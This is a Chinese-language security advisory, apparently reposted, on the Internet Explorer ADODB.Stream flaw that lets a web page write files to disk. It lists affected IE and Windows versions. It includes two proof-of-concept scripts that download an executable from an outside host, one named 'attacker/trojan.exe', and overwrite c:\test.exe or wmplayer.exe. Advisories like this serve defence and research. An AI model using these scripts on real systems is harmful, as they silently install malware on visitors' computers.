技术总汇

xiangtian

涉及程序：
Microsoft Internet Explorer ADODB.Stream
  
描述：
Microsoft Internet Explorer ADODB.Stream对象文件安装漏洞
  
详细：
Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer ADODB.Stream对象实现存在问题，远程攻击者可以利用这个漏洞在目标用户系统上安装恶意文件。

问题是脚本可利用ADODB.Stream对象写或覆盖攻击者指定的文件到目标文件系统中，以这种方式，攻击者构建的恶意页面，当用户浏览器时，可使HTML文档利用ADODB.Stream对象在磁盘上安装文件。

要利用这个漏洞一般需要其他漏洞结合，如重定向浏览器到本地安全区域，然后使恶意文件在此上下文执行，写文件到系统上。也需要其他攻击因素的存在，如引诱用户下载HTML文档并使用浏览器打开，也可以利用HTML形式的EMAIL来触发。

受影响系统：
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
   - Microsoft Windows XP Professional
   - Microsoft Windows XP Home
   - Microsoft Windows NT 4.0 SP6a
   - Microsoft Windows ME
   - Microsoft Windows 98 SE
   - Microsoft Windows 98
   - Microsoft Windows 2003 Web Edition
   - Microsoft Windows 2003 Standard Edition
   - Microsoft Windows 2003 Enterprise Edition 64-bit
   - Microsoft Windows 2003 Enterprise Edition
   - Microsoft Windows 2003 Datacenter Edition 64-bit
   - Microsoft Windows 2003 Datacenter Edition
   - Microsoft Windows 2000 Server SP2
   - Microsoft Windows 2000 Server SP1
   - Microsoft Windows 2000 Server
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Datacenter Server SP2
   - Microsoft Windows 2000 Datacenter Server SP1
   - Microsoft Windows 2000 Datacenter Server
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server

  
攻击方法：
警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

jelmer （[email protected]）提供了如下测试方法：

<script language="vbscript">

const adTypeBinary = 1
const adSaveCreateOverwrite = 2
const adModeReadWrite = 3

set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
xmlHTTP.open "GET","http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE",
false
xmlHTTP.send
contents = xmlHTTP.responseBody

Set oStr = CreateObject("ADODB.Stream")
oStr.Mode = adModeReadWrite
oStr.Type = adTypeBinary
oStr.Open

oStr.Write(contents)
oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite

</script>


以下是Jelmer演示的覆盖wmplayer.exe:

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://attacker/trojan.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
解决方案：
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp